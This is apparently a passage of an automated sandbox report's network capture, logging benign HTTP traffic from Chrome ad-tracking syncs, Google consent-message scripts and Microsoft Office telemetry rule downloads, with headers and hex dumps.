                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: mako_uid=1928a4d19e7-64f90000010f4043; SERVERID=16451~DM
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC481INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: SERVERID=16451~DM; Domain=eyeota.net; Path=/; Expires=Mon, 14 Oct 2024 09:22:42 GMT; Secure; SameSite=None;
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="CURa ADMa DEVa TAIo PSAo PSDo OUR SAMo BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="http://ps.eyeota.net/w3c/p3p.xml"
                                                                                                                                                                                                                                                                                                                                                                          Location: https://sync.sharethis.com/eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          136192.168.2.74991234.117.77.794432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC734OUTGET /csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ml314.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: pi=3647697138334302238
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          expires: Tue, 15 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: Google Frontend
                                                                                                                                                                                                                                                                                                                                                                          via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC49INData Raw: 32 62 0d 0a 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 2bGIF89a!,D;
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          137192.168.2.74991313.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: dd0a9e0e-c01e-002b-7a7e-1b6e00000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cf6qp7g7r97wxgbqc00000005dg000000009ru4
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          138192.168.2.74991413.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 485
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: ebcfca05-e01e-0051-5418-1c84b2000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cf8rgvlb86c9c0098000000046g000000009z6m
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          139192.168.2.74991513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 411
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: b3584e95-501e-0029-5500-1bd0b8000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cfbr2wt66emzt78g400000005u00000000016tk
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          140192.168.2.74991613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 640ec2fa-901e-0083-59e1-1abb55000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091243Z-17db6f7c8cf4g2pjavqhm24vp400000006a000000000990c
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          141192.168.2.749918142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1058OUTGET /f/AGSKWxX0-0x5HivWeZLchiQ-nD7g2ILscryuZP_ALv6f3ICLAOJ-avY8-qKfwAdUk5OjIfQJNpUfSt6dcMucORzNFPmm-eBr07hAP4N-Gd6Dh2lmgPI8mzM7UY1l8KzcVJqhr_oszQslaA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYxLDQ0OTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1918INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorGlobalRouterHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-qm8DULSNvZKjJVhJZo9Gtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorGlobalRouterHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorGlobalRouterHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorGlobalRouterHttp/web-reports?context=eJzjqtDikmLw05BiOO90h-k6EEt8fcmkAcRO6TNYg4C49eY51qlAnPTvPGsRELtrXWT1B2JDhUusjiBcdInVE4hVey6xmgLx_XWXWJ8D8dc9l1j_AvHej5dYjwJxkcQV1iYgvt10hfUxEAvxcHQf3LyDTeDA6o8TGZU0kvIL45Pz80qKMpNKS_KL0pLTUotTi8pSi-KNDIxMDA0MLPUMjOILDABEkUp1"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1918INData Raw: 64 31 30 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 75 28 61 29 7d 3b 5f 2e 79 28 54 6f 2c 5f 2e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d10if (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{var To=function(a){this.l=_.u(a)};_.y(To,_.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC1433INData Raw: 5c 5c 5c 75 30 30 33 64 5c 5c 5c 5c 75 30 30 33 64 5c 5c 5c 78 32 32 5c 78 35 64 2c 6e 75 6c 6c 2c 5c 78 35 62 5c 78 35 62 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 5c 5c 78 32 32 68 74 74 70 73 3a 5c 2f 5c 2f 66 75 6e 64 69 6e 67 63 68 6f 69 63 65 73 6d 65 73 73 61 67 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 5c 2f 66 5c 2f 41 47 53 4b 57 78 56 6c 76 4f 59 61 6a 62 6d 43 50 53 32 71 4b 61 69 36 49 37 6f 33 43 4c 5a 78 35 6e 49 31 63 75 76 44 56 6e 4d 41 41 42 6d 66 48 57 2d 38 4d 59 65 77 69 58 6f 53 5a 66 74 45 39 6b 79 44 5a 59 7a 4b 4f 53 4c 62 36 42 6e 43 54 76 71 75 55 74 48 6f 71 50 30 47 66 5f 78 43 72 54 67 46 66 74 66 32 4c 77 32 4c 64 66 79 55 66 46 7a 4e 6f 64 66 57 61 78 78 38 71 74 39 63 5f 36 48 73 7a 43 58 49 71 34 55 6c 39 51 5c 5c 5c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: \\\u003d\\\\u003d\\\x22\x5d,null,\x5b\x5bnull,null,null,\\\x22https:\/\/fundingchoicesmessages.google.com\/f\/AGSKWxVlvOYajbmCPS2qKai6I7o3CLZx5nI1cuvDVnMAABmfHW-8MYewiXoSZftE9kyDZYzKOSLb6BnCTvquUtHoqP0Gf_xCrTgFftf2Lw2LdfyUfFzNodfWaxx8qt9c_6HszCXIq4Ul9Q\\\
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          142192.168.2.749919142.250.185.1424432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:43 UTC890OUTGET /f/AGSKWxVA2AfsAy6bl_orgjLa-ktICoGbho28bTgmHZldatP8mM9GwgjDSaR33p-zQ4Z3psf-T6y01RyIJMRcXpsGke0ygK7nxYIumXDTYW3tVyk60W-PkqmH1keGLWmdi96iIP5_4zM-Fg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYwLDQ3NzAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vYWxkLm15LmlkLyIsbnVsbCxbWzgsInRhQmdHdlJRQzIwIl0sWzksImVuLVVTIl0sWzE4LCJbW1swXV1dIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
